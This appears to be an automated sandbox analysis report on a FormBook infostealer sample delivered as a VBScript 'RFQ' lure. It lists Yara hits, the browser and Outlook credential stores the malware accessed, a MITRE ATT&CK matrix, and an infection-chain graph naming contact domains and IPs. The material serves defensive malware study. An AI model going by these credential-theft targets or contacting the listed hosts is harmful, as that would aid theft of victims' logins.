              Source: Yara matchFile source: 00000009.00000002.3362243547.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363072352.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2678660679.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362422336.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363813241.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362962777.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677237054.00000000007D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677849171.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 5.2.RegAAsm.exe.7d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.3362243547.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363072352.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2678660679.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362422336.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363813241.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362962777.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677237054.00000000007D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677849171.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Exploitation for Client Execution              		221
              Scripting              		1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		13
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              PowerShell              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory113
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
              Process Injection              		1
              Abuse Elevation Control Mechanism              		Security Account Manager221
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook5
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script13
              Software Packing              		LSA Secrets41
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612328 Sample: BINATONE LLC RFQ.Vbs.vbs Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 45 www.zkplant.xyz 2->45 47 www.meacci.xyz 2->47 49 3 other IPs or domains 2->49 71 Suricata IDS alerts for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 79 6 other signatures 2->79 12 wscript.exe 16 2->12         started        signatures3 77 Performs DNS queries to domains with low reputation 47->77 process4 dnsIp5 51 87.120.120.56, 49704, 49705, 80 UNACS-AS-BG8000BurgasBG Bulgaria 12->51 43 C:\Temp\JSDSDGSD.ps1, ASCII 12->43 dropped 93 System process connects to network (likely due to code injection or exploit) 12->93 95 VBScript performs obfuscated calls to suspicious functions 12->95 97 Wscript starts Powershell (via cmd or directly) 12->97 99 2 other signatures 12->99 17 powershell.exe 13 12->17         started        file6 signatures7 process8 file9 39 C:\Users\user\AppData\Local\Temp\x.exe, PE32+ 17->39 dropped 59 Found suspicious powershell code related to unpacking or dynamic code loading 17->59 61 Powershell drops PE file 17->61 21 x.exe 14 5 17->21         started        25 conhost.exe 17->25         started        signatures10 process11 file12 41 C:\Users\user\AppData\Local\...\RegAAsm.exe, PE32 21->41 dropped 81 Antivirus detection for dropped file 21->81 83 Machine Learning detection for dropped file 21->83 27 RegAAsm.exe 21->27         started        signatures13 process14 signatures15 85 Antivirus detection for dropped file 27->85 87 Multi AV Scanner detection for dropped file 27->87 89 Machine Learning detection for dropped file 27->89 91 Maps a DLL or memory area into another process 27->91 30 HDIZeRcLxXsNvd.exe 27->30 injected process16 dnsIp17 53 www.adventurerepair24.live 188.114.96.3, 49981, 49982, 49983 CLOUDFLARENETUS European Union 30->53 55 www.trosky.lol 188.114.97.3, 49993, 80 CLOUDFLARENETUS European Union 30->55 57 2 other IPs or domains 30->57 101 Maps a DLL or memory area into another process 30->101 103 Found direct / indirect Syscall (likely to bypass EDR) 30->103 34 systray.exe 13 30->34         started        signatures18 process19 signatures20 63 Tries to steal Mail credentials (via file / registry access) 34->63 65 Tries to harvest and steal browser information (history, passwords, etc) 34->65 67 Modifies the context of a thread in another process (thread injection) 34->67 69 2 other signatures 34->69 37 firefox.exe 34->37         started        process21

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.